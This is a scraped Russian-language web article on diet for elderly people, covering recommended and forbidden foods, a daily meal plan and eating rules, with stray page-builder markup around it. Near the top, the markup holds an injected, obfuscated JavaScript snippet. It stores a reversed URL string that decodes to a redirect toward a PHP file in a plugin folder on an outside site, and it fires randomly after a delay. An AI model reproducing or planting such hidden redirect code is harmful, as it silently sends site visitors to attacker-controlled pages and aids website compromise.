to-widget-row row-gutter-0″ data-widget=”row” data-draggable-disabled=””>

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-widget moto-widget-text moto-preset-default moto-spacing-top-auto moto-spacing-right-auto moto-spacing-bottom-auto moto-spacing-left-auto” data-widget=”text” data-preset=”default” data-draggable-disabled=””>

to-widget-text-editable”>

Питание в пожилом возрасте имеет свои особенности. Для обеспечения жизнедеятельности организма по-прежнему требуется энергия, однако двигается человек меньше, метаболизм замедляется, появляются возрастные заболевания, что необходимо учитывать при выборе продуктов и составлении суточного рациона.

При правильном питании здоровье и самочувствие улучшается, при неправильном – сокращается продолжительность жизни, появляются осложнения заболеваний. Избежать неприятностей можно, если строго выполнять рекомендации диетолога.

Продукты для питания лиц преклонного возраста: можно и нельзя

Однообразие за столом надоедает и ведет к расстройствам пищеварения. Однако не все продукты позволительно употреблять в пищу тем, кто перешагнул рубеж 70, 80, а то и 90 лет. Блюда в рационе должны быть легкоусвояемыми, низкокалорийными, но при этом вкусными и полезными. Получая достаточное количество микроэлементов и натуральных витаминов, удается замедлить процессы старения организма и прожить дольше.

Белка потребуется меньше, потому что рост остановился, на выполнение работы энергии затрачивается мало, а вот растительной клетчатки нужно много, чтобы поддерживать уровень микрофлоры, избежать проблем с перистальтикой кишечника.

В рацион лиц зрелого возраста обязательно включаются:

  • каши: овсяная, гречневая, пшенная, кукурузная, редко рисовая;
  • овощи: практически все в сыром, вареном, тушеном виде, приготовленные на пару;
  • фрукты: в сыром или запеченном виде, в компотах;
  • зелень: для обеспечения организма витаминами и необходимыми микроэлементами;
  • молочные продукты: для улучшения пищеварения;
  • рыба: нежирные сорта;
  • мед: идеальная замена сахара и сладостей;
  • яйца: не больше 2 – 3 штук на протяжении недели.

В небольшом количестве в рацион изредка добавляется нежирное мясо, сливочное масло, хлебобулочные изделия, фасоль, грибы. Некоторые продукты совсем не рекомендуется вводить в питание пожилых людей.

Под запрет попадают:

  • газированные и спиртные напитки;
  • кофе;
  • сало;
  • копчености.

Сохранить здоровье поможет ограниченное употребление соли, консервированных продуктов, сахара, выпечки.

Как составить меню для пожилого человека?

С возрастом работа пищеварительного тракта замедляется. Не так быстро, как у молодых, происходят процессы расщепления и переработки пищи. В связи с этим мужчины и женщины в годах жалуются на отсутствие аппетита или тяжесть после принятия еды. Чтобы избежать неприятностей, надо правильно планировать рацион. В меню рекомендуются лишь те блюда, которые легко усваиваются.

Утро желательно начинать с дополнительного завтрака, который предполагает травяной чай и небольшой бутерброд с сыром. Такой легкий перекус подготовит организм к дальнейшему приему пищи.

На второй завтрак подается каша. Дополнить ее могут запеченные фрукты или овощи.

Обеденная порция отличается своим объемом. Кроме супа и второго блюда уместно предложить легкий салат из овощей, сок или компот из фруктов.

На полдник рекомендуются натуральные соки, не вызывающие газообразования, йогурты, молоко, фрукты.

Ужин у пожилых людей планируется не позже 19.00. Выбор блюд огромен: каши, сырники, запеченные овощи, пюре. К ним добавляется компот, чай.

Советы по приему пищи в преклонном возрасте

Как переедание, так и голодовка опасна для стариков. При избыточном потреблении еды развивается ожирение, повышается давление, при недостатке пищи наблюдается истощение, общая слабость, понижение гемоглобина.

Простые правила помогут чувствовать себя бодро, энергично:
  1. Приемы пищи должны быть частыми (5-ти разовое питание).
  2. Ограничение объема порции.
  3. Соблюдение режима питания.

Большинству одиноких людей сложно закупать продукты, готовить дома ежедневно свежую пищу.

В домашних условиях соблюдение всех этих требований даже при внимательном отношении родственников к лицам преклонного возраста практически невозможно.